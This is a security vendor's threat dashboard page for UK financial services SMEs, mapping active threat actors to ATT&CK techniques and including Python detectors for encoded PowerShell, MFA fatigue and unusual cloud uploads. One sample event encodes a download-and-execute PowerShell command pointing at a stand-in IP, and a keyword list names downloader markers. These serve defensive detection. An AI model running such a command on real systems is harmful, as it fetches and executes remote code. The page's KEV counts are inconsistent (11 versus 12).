MITRE ATT&CK SME Edition ● Live

MITRE-Lite Threat Dashboard

The full MITRE ATT&CK framework catalogues several hundred techniques and sub-techniques used by nation-states and organised criminal groups. This dashboard cuts it down to the techniques actually being used against UK SMEs and financial services firms right now, in plain English.

Last updated: 2 June 2026  ·  Week 23 / 2026

NCSC feed: current  ·  CISA KEV: current  ·  Actor profiles: weekly review

Refreshed every Monday. Next update: 9 June 2026.

Active Threat Actors Targeting UK Financial Services

7 active threat actor groups: confirmed targeting UK financial services SMEs
14 techniques in active use: from the SME-relevant ATT&CK subset
3 new techniques this week: added since last Monday's refresh
11 CISA KEV entries mapped to broker-relevant techniques: 8 Critical, 3 High
What is MITRE ATT&CK? It is a publicly available knowledge base, maintained by MITRE, of the tactics and techniques adversaries have been observed using in real intrusions: think of it as a documented playbook of what criminal groups and state-sponsored hackers actually do once they target you. This dashboard filters it down to the techniques that realistically threaten businesses like yours: small financial services firms, insurance brokers, and professional services companies in the UK.
Each entry lists the group's origin, primary method, the ATT&CK technique IDs currently in use, and our SME risk rating.

Scattered Spider (aka UNC3944, Octo Tempest)
Origin: Cybercrime
Primary method: SIM-swapping and social engineering to bypass MFA; targets IT helpdesks to gain access.
Active techniques: T1078, T1566.001, T1621
SME risk: HIGH

ALPHV / BlackCat (Ransomware-as-a-Service group)
Origin: Cybercrime
Primary method: Ransomware deployment following stolen credentials and VPN exploitation. Known to target professional services firms.
Active techniques: T1486, T1190, T1657
SME risk: HIGH

APT29 / Cozy Bear (SVR, Russian Foreign Intelligence)
Origin: Russia / state
Primary method: Spearphishing and supply chain compromise. Primarily targets government and finance. Sophisticated, long-dwell operations.
Active techniques: T1566.002, T1195, T1071.001
SME risk: MEDIUM

APT40 / BRONZE MOHAWK (Chinese MSS-linked group)
Origin: China / state
Primary method: Exploitation of internet-facing services and VPNs. Actively targeting financial data and intellectual property.
Active techniques: T1190, T1133, T1041
SME risk: MEDIUM

MuddyWater (STATIC KITTEN, Iranian MOIS)
Origin: Iran / state
Primary method: Phishing and exploitation of web frameworks (Laravel, Zimbra). Targeting professional services and finance for espionage.
Active techniques: T1566.001, T1190, T1059
SME risk: MEDIUM

LockBit 3.0 Affiliates (Ransomware-as-a-Service network)
Origin: Cybercrime
Primary method: Access brokers sell network entry to affiliates who then deploy LockBit ransomware. SMEs frequently targeted as easier entry points.
Active techniques: T1486, T1078, T1083
SME risk: HIGH

TA4903 (BEC specialists; Business Email Compromise group)
Origin: Cybercrime
Primary method: Impersonation of senior staff, solicitors, and payment processors to redirect bank transfers. Primary threat vector for insurance brokers.
Active techniques: T1566.002, T1534, T1078
SME risk: HIGH

How Much of This Does GET-IT Cover?

9 techniques covered: the GET-IT stack addresses these directly
64% coverage rate: of the 14 active techniques this week
5 uncovered techniques: an honest gap, not covered by the current stack
Partial exfiltration coverage: monitoring detects data movement but cannot always block it
We show you the gaps honestly. No security provider covers everything. The 5 uncovered techniques below include areas where mitigations depend on human behaviour (staff training) or third-party dependencies (your cloud provider, your line-of-business software vendor). We flag them so you know what to ask about — and so you can factor them into cyber insurance conversations.

Coverage by Tactic

Initial Access: 75% (3 of 4 techniques)
Execution: 80% (4 of 5 techniques)
Persistence: 67% (2 of 3 techniques)
Lateral Movement: 50% (1 of 2 techniques)
Exfiltration: 33% (1 of 3 techniques)
Impact: 100% (3 of 3 techniques)

Note: a single ATT&CK technique can belong to more than one tactic (Valid Accounts, T1078, sits under Initial Access, Persistence, Privilege Escalation and Defense Evasion), so the per-tactic counts above add up to more than the 14 techniques tracked this week.
Exfiltration gap: what this means for your insurance. If an attacker reaches your data and moves it out slowly through legitimate cloud services (Microsoft OneDrive, SharePoint, or email), detection requires behavioural monitoring of where data is going and in what volume, which standard endpoint protection does not provide on its own. Many cyber insurance policies cover data exfiltration, but typically only where you can demonstrate that reasonable preventive and monitoring controls were in place at the time. Speak to us if this concerns you.

Techniques in Use Against UK SMEs This Week

T1566.001 · T1566.002
Phishing — Email & Link-based
Attackers send fake emails pretending to be HMRC, your bank, a solicitor, or a trusted supplier. The email contains a malicious attachment or a link to a fake login page designed to steal your password.
T1190
Exploit Public-Facing Application
Attackers search for unpatched software on your internet-facing systems — VPNs, firewalls, web apps — and exploit known security holes to get in. This is the entry point for many ransomware campaigns. This week: Palo Alto PAN-OS VPN bypass (CVE-2026-0257) confirmed actively exploited.
T1078
Valid Accounts (Stolen Credentials)
An attacker who has obtained a username and password (from a previous breach, phishing, or the dark web) simply logs in using legitimate credentials. No hacking required — they look like a real user.
T1059
Command and Scripting Interpreter (PowerShell / cmd)
Once inside, attackers use built-in Windows tools (PowerShell, sub-technique T1059.001; the command prompt, T1059.003) to run malicious commands without installing suspicious software. This makes them harder to detect because they are using your own tools against you. A common tell is PowerShell launched with a hidden window and a base64-encoded command line, which is worth reviewing whenever it appears, since few everyday admin tasks need it.
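As an added example (not part of the dashboard or the GET-IT stack), the check below decodes a PowerShell -EncodedCommand payload from process-creation events and flags the strings that usually accompany a downloader. The sample events, hostnames, usernames and the 198.51.100.7 address are constructed for illustration.

```python
import base64
import re

# powershell.exe accepts any unambiguous prefix of -EncodedCommand, plus the
# short forms -e and -ec, with either "-" or "/" as the switch character.
_PREFIXES = ["e", "ec"] + ["encodedcommand"[:n] for n in range(2, 15)]
ENC_FLAG = re.compile(
    r"(?i)(?<!\S)[-/](?:" + "|".join(sorted(_PREFIXES, key=len, reverse=True)) + r")\s+"
    r"(?P<b64>[A-Za-z0-9+/]{8,}={0,2})"
)

# Substrings that recur in living-off-the-land downloaders and stagers.
SUSPICIOUS_MARKERS = (
    "iex", "invoke-expression", "downloadstring", "downloadfile",
    "net.webclient", "invoke-webrequest", "frombase64string",
    "-w hidden", "-nop", "reflection.assembly",
)


def decode_encoded_command(cmdline):
    """Return the plaintext of a -EncodedCommand payload, or None if absent or undecodable."""
    match = ENC_FLAG.search(cmdline)
    if not match:
        return None
    try:
        # PowerShell expects the payload to be base64 of UTF-16LE text (no BOM).
        return base64.b64decode(match.group("b64"), validate=True).decode("utf-16-le")
    except ValueError:  # binascii.Error and UnicodeDecodeError both derive from ValueError
        return None


def find_markers(text):
    """List the suspicious markers present in the visible and decoded command line."""
    lowered = text.lower()
    return [m for m in SUSPICIOUS_MARKERS if m in lowered]


def triage(events):
    """Flag PowerShell process-creation events that carry an encoded command."""
    findings = []
    for ev in events:
        image = ev["cmdline"].split()[0].lower().rsplit("\\", 1)[-1]
        if image not in ("powershell.exe", "pwsh.exe", "powershell", "pwsh"):
            continue
        decoded = decode_encoded_command(ev["cmdline"])
        if decoded is None:
            continue
        markers = find_markers(ev["cmdline"] + " " + decoded)
        findings.append({
            "host": ev["host"],
            "user": ev["user"],
            "decoded": decoded,
            "markers": markers,
            "severity": "high" if markers else "review",
        })
    return findings


def _encode_command(script):
    """Build a -EncodedCommand value the way an attacker (or admin) would."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample events in Sysmon Event ID 1 / Windows 4688 style; not real telemetry.
SAMPLE_EVENTS = [
    {"host": "FIN-WS07", "user": "j.smith",
     "cmdline": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "
                r"-NoProfile -ExecutionPolicy Bypass -File C:\Scripts\nightly-backup.ps1"},
    {"host": "FIN-WS07", "user": "j.smith",
     "cmdline": "powershell.exe -nop -w hidden -enc " + _encode_command(
         "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.ps1')")},
    {"host": "FIN-WS03", "user": "a.patel", "cmdline": "cmd.exe /c whoami /groups"},
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f["severity"].upper(), f["host"], f["user"], f["markers"])
        print("   decoded:", f["decoded"])
```

The benign backup script is not flagged because it is a plain -File invocation; the second event is flagged as high because the decoded payload fetches and executes remote code and the launcher hides its window. Any event that decodes but matches no marker is still returned for review, since encoded commands are rare in day-to-day SME administration.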
T1621
MFA Fatigue (Multi-Factor Authentication Request Generation)
An attacker who already has your password triggers dozens of multi-factor authentication (MFA) push notifications to your phone, hoping you will accidentally approve one, or approve it just to make the alerts stop. A single tap hands them a fully authenticated session. This works against approve/deny push prompts; number matching in the authenticator app or phishing-resistant methods such as FIDO2 security keys close the gap.
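An added example of the detection a practitioner would run over identity sign-in logs (not code from the dashboard): count failed MFA prompts per account inside a short window and record whether a successful sign-in followed the burst. The log lines are constructed; the result codes follow Entra ID's sign-in log convention (0 for success, 500121 for a failed strong-authentication request) and should be verified against your own tenant before use.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Result codes as seen in Entra ID sign-in logs. 500121 ("authentication failed
# during strong authentication request") is what a denied or timed-out push
# prompt produces. Assumption for the example: confirm against your tenant.
MFA_FAILED = 500121
SUCCESS = 0


def parse_signins(lines):
    """Parse constructed 'time user code ip' lines into sign-in records."""
    records = []
    for line in lines:
        ts, user, code, ip = line.split()
        records.append({
            "time": datetime.fromisoformat(ts.replace("Z", "+00:00")),
            "user": user.lower(),
            "code": int(code),
            "ip": ip,
        })
    return records


def detect_mfa_fatigue(records, window=timedelta(minutes=10), threshold=5):
    """Alert when one account collects `threshold` failed MFA prompts within `window`.

    Also report whether a successful sign-in followed the burst: that is the
    signal that the user eventually tapped Approve and the account is compromised.
    """
    by_user = defaultdict(list)
    for r in records:
        by_user[r["user"]].append(r)

    alerts = []
    for user, evs in by_user.items():
        evs.sort(key=lambda e: e["time"])
        failures = [e for e in evs if e["code"] == MFA_FAILED]
        for i, first in enumerate(failures):
            burst = [f for f in failures[i:] if f["time"] - first["time"] <= window]
            if len(burst) < threshold:
                continue
            burst_end = burst[-1]["time"]
            approved = next((e for e in evs if e["code"] == SUCCESS
                             and burst_end <= e["time"] <= burst_end + window), None)
            alerts.append({
                "user": user,
                "failures": len(burst),
                "started": first["time"].isoformat(),
                "source_ips": sorted({f["ip"] for f in burst}),
                "approved_after_burst": approved is not None,
            })
            break  # one alert per account per run
    return alerts


# Constructed sign-in log lines, not real tenant data.
SAMPLE_SIGNINS = [
    "2026-06-01T07:31:05Z f.director@example-brokers.co.uk 500121 203.0.113.45",
    "2026-06-01T07:32:10Z f.director@example-brokers.co.uk 500121 203.0.113.45",
    "2026-06-01T07:33:02Z f.director@example-brokers.co.uk 500121 203.0.113.45",
    "2026-06-01T07:34:40Z f.director@example-brokers.co.uk 500121 203.0.113.45",
    "2026-06-01T07:35:15Z f.director@example-brokers.co.uk 500121 203.0.113.45",
    "2026-06-01T07:36:50Z f.director@example-brokers.co.uk 500121 203.0.113.45",
    "2026-06-01T07:38:00Z f.director@example-brokers.co.uk 500121 203.0.113.45",
    "2026-06-01T07:39:20Z f.director@example-brokers.co.uk 0 203.0.113.45",
    "2026-06-01T09:02:11Z j.smith@example-brokers.co.uk 500121 198.51.100.20",
    "2026-06-01T09:03:30Z j.smith@example-brokers.co.uk 0 198.51.100.20",
    "2026-06-01T14:30:44Z j.smith@example-brokers.co.uk 500121 198.51.100.20",
]

if __name__ == "__main__":
    for alert in detect_mfa_fatigue(parse_signins(SAMPLE_SIGNINS)):
        print(alert)
```

The second user's two isolated failures hours apart are the normal noise of a mistyped prompt and produce nothing. The first account shows seven denials in seven minutes followed by a success from the same address, which is the pattern to treat as a compromised session: revoke tokens and reset the password rather than just asking the user whether they approved it.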
T1598.001
Messaging App Targeting (Phishing for Information: Spearphishing Service)
Attackers harvest WhatsApp, Signal, and LinkedIn accounts of senior staff to build social engineering profiles, then impersonate trusted contacts over those same services to extract credentials or authorise fraudulent payments. NCSC issued a specific warning this week.
T1133
External Remote Services (VPN Abuse)
Attackers exploit or abuse your VPN, remote desktop (RDP), or remote access tools to maintain persistent access — often long after the initial breach is discovered. They effectively install a back door.
T1534
Internal Spearphishing
Having compromised one email account, attackers use it to send convincing phishing emails to other staff internally. For example, a message that appears to come from your MD or finance director asking for an urgent payment to be approved.
T1567 · T1041
Data Exfiltration via Cloud Services and Attacker Channels
Attackers copy your files out through legitimate cloud services such as SharePoint, OneDrive, Dropbox or Google Drive (T1567, Exfiltration Over Web Service) because that traffic looks normal to most security tools, or send them back over the same connection their malware already uses to receive instructions (T1041, Exfiltration Over C2 Channel). Either way the data is gone before anyone notices unless someone is watching upload volumes and destinations.
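An added example, not part of the dashboard, of the behavioural check that the exfiltration gap described in the coverage section and this technique entry both call for: per-user daily upload volume to cloud storage compared against that user's own median, plus a flag for services the firm does not sanction. The proxy log lines, usernames, hostnames and the list of sanctioned services are constructed assumptions.

```python
from collections import defaultdict
from statistics import median

# Cloud storage services as they appear in web-proxy or firewall logs. Which of
# them are sanctioned is an assumption for the example; use your own tenant's list.
CLOUD_STORAGE = ("sharepoint.com", "onedrive.com", "dropbox.com", "drive.google.com",
                 "box.com", "wetransfer.com", "mega.nz")
SANCTIONED = ("sharepoint.com", "onedrive.com")


def storage_service(host):
    """Map a destination host (e.g. acmebrokers-my.sharepoint.com) to a known service, or None."""
    host = host.lower()
    for svc in CLOUD_STORAGE:
        if host == svc or host.endswith("." + svc):
            return svc
    return None


def parse_proxy(lines):
    """Parse constructed 'time user host bytes_sent' lines, keeping only cloud-storage uploads."""
    records = []
    for line in lines:
        ts, user, host, sent = line.split()
        svc = storage_service(host)
        if svc is None:
            continue
        records.append({"day": ts[:10], "user": user.lower(), "service": svc, "bytes": int(sent)})
    return records


def detect_upload_anomalies(records, today, ratio=5.0, floor=200_000_000, min_baseline_days=3):
    """Flag users whose upload volume on `today` is far above their own history,
    or who pushed data to a cloud service the firm does not sanction.

    The threshold is the larger of `ratio` times the user's median daily volume
    and an absolute `floor`, so a quiet user is not flagged for a 5 MB day.
    """
    per_user_day = defaultdict(lambda: defaultdict(int))
    unsanctioned_today = defaultdict(set)
    for r in records:
        per_user_day[r["user"]][r["day"]] += r["bytes"]
        if r["day"] == today and r["service"] not in SANCTIONED:
            unsanctioned_today[r["user"]].add(r["service"])

    alerts = []
    for user, days in per_user_day.items():
        today_bytes = days.get(today, 0)
        history = [b for d, b in days.items() if d < today]
        threshold = floor
        detail = f"no baseline (fewer than {min_baseline_days} prior days)"
        if len(history) >= min_baseline_days:
            baseline = median(history)
            threshold = max(ratio * baseline, floor)
            detail = f"median {int(baseline):,} B over {len(history)} days"
        reasons = []
        if today_bytes > threshold:
            reasons.append(f"upload volume {today_bytes:,} B exceeds {int(threshold):,} B ({detail})")
        if unsanctioned_today.get(user):
            reasons.append("unsanctioned service: " + ", ".join(sorted(unsanctioned_today[user])))
        if reasons:
            alerts.append({"user": user, "today_bytes": today_bytes, "reasons": reasons})
    return alerts


# Constructed proxy log lines (UTC timestamp, user, destination host, bytes sent); not real traffic.
SAMPLE_PROXY_LOG = [
    "2026-05-25T09:12:44Z m.lee acmebrokers.sharepoint.com 18000000",
    "2026-05-26T10:03:10Z m.lee acmebrokers.sharepoint.com 24000000",
    "2026-05-27T11:40:51Z m.lee acmebrokers.sharepoint.com 15000000",
    "2026-05-28T09:55:03Z m.lee acmebrokers.sharepoint.com 31000000",
    "2026-05-29T16:21:37Z m.lee acmebrokers.sharepoint.com 22000000",
    "2026-05-30T08:47:19Z m.lee acmebrokers.sharepoint.com 9000000",
    "2026-06-01T08:30:00Z m.lee acmebrokers.sharepoint.com 22000000",
    "2026-06-01T22:14:08Z m.lee www.dropbox.com 1100000000",
    "2026-06-01T22:41:52Z m.lee www.dropbox.com 1200000000",
    "2026-05-25T09:30:12Z j.smith acmebrokers-my.sharepoint.com 40000000",
    "2026-05-26T09:31:45Z j.smith acmebrokers-my.sharepoint.com 35000000",
    "2026-05-27T13:02:09Z j.smith acmebrokers-my.sharepoint.com 52000000",
    "2026-05-28T09:10:33Z j.smith acmebrokers-my.sharepoint.com 28000000",
    "2026-05-29T15:44:20Z j.smith acmebrokers-my.sharepoint.com 44000000",
    "2026-05-30T10:05:57Z j.smith acmebrokers-my.sharepoint.com 60000000",
    "2026-06-01T09:15:26Z j.smith acmebrokers-my.sharepoint.com 38000000",
    "2026-06-01T12:48:03Z j.smith www.bbc.co.uk 12000",
]

if __name__ == "__main__":
    for alert in detect_upload_anomalies(parse_proxy(SAMPLE_PROXY_LOG), today="2026-06-01"):
        print(alert["user"], alert["today_bytes"])
        for reason in alert["reasons"]:
            print("  -", reason)
```

Only m.lee is flagged, on two grounds: 2.3 GB in one evening against a median of 20 MB a day, and a destination (Dropbox) the firm does not use. A user with no history falls back to the absolute floor rather than being ignored. Keeping the per-user, per-day totals is also what lets you show an insurer after the fact exactly when the data left and to where.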
T1486
Data Encryption for Ransom (Data Encrypted for Impact)
The final step in most ransomware attacks — all your files are encrypted and you're locked out of your own systems. A ransom demand follows. UK SMEs paid an average of £47,000 per incident in 2025, with recovery taking 3–4 weeks.
T1657
Financial Theft (Business Email Compromise)
An attacker with access to a business email account monitors payment conversations and intercepts at the right moment — substituting their own bank account details. The #1 financial loss vector for UK insurance brokers and professional services firms.

Current Risk Status for UK Financial Services SMEs

THREAT LEVEL: ELEVATED

Sustained High-Activity Period — Financial Services Sector

NCSC and industry sources indicate continued elevated threat activity targeting UK professional services and financial sector SMEs. BEC attacks on insurance brokers are up approximately 34% year-on-year. Ransomware affiliate groups continue to prioritise SME targets identified as having weaker controls than enterprise counterparts. No specific imminent threat to a named organisation — but the baseline risk for this sector remains above normal.

Highest Severity Active Technique — Week 23 / 2026

VPN Authentication Bypass (T1190) — Palo Alto PAN-OS Critical Vulnerability

CISA added CVE-2026-0257 to its Known Exploited Vulnerabilities catalog on 29 May 2026: a critical authentication bypass in Palo Alto Networks PAN-OS that allows attackers to establish an unauthorised VPN connection without valid credentials. If your business uses Palo Alto firewalls or VPN appliances and has not patched in the past week, treat this as urgent. Patching closes the door but does not remove anyone who already walked through it, so also review VPN authentication logs and active sessions from the disclosure date onward for logins from unfamiliar locations or outside working hours. Ransomware affiliate groups actively use VPN bypass as their primary initial access technique against UK SMEs. NCSC separately issued a warning this week on messaging app targeting: WhatsApp and Signal accounts of senior staff and executives are being actively harvested to build convincing social engineering profiles prior to BEC attacks.

Ransomware Activity Indicator

ACTIVE — LockBit 3.0 Affiliates and ALPHV/BlackCat Successors Operational

Both ransomware-as-a-service ecosystems remain active with affiliate networks continuing to acquire access from initial access brokers. UK professional services firms make up approximately 18% of confirmed UK ransomware victims in Q1 2026 (NCSC data). Offline backups, patching cadence, and tested recovery plans are the three most effective mitigations at this level.

Live Source Summary

NCSC UK Alerts: 7
Active NCSC advisories relevant to UK SME and financial services environments. Includes new warning on messaging app targeting and Russian military router hijacking.
Latest: 31 May 2026

CISA KEV Entries (SME-Relevant): 12
Known-exploited vulnerabilities mapped to software commonly used by UK SMEs. New critical entry: Palo Alto PAN-OS authentication bypass (CVE-2026-0257).
Latest: 29 May 2026

Top Sector Affected This Week: Finance & Insurance
FCA press release confirms 49% of young drivers have purchased insurance via social media or messaging apps, with unauthorised firms operating at scale. Insurance brokers are primary targets for BEC this week.
FCA ScamSmart updated: 28 May 2026
Full Advisory Detail
For full advisory detail, vulnerability write-ups, and CISA KEV entries see the Threat Advisory page.

Has Your Email Been Breached?
Check whether your business email appears in known breach databases (free check).

Does Your Security Stack Cover These Techniques?

64% coverage of active techniques is a starting point. If you'd like to understand exactly where your gaps are — and what it would cost to close them — book a resilience scan.

Book a Resilience Scan →

Intelligence sourced from NCSC UK, the CISA Known Exploited Vulnerabilities Catalog, FCA ScamSmart, and the MITRE ATT&CK framework (used under MITRE's ATT&CK terms of use). Technique descriptions are plain-English interpretations for SME audiences and are not verbatim reproductions of MITRE documentation. Coverage assessments reflect the GET-IT stack as configured for a typical SME client; actual coverage depends on your specific environment. This dashboard is updated weekly; data may not reflect events in the 24 to 48 hours prior to the last refresh date. GET-IT Solutions Ltd is not responsible for inaccuracies in third-party source data.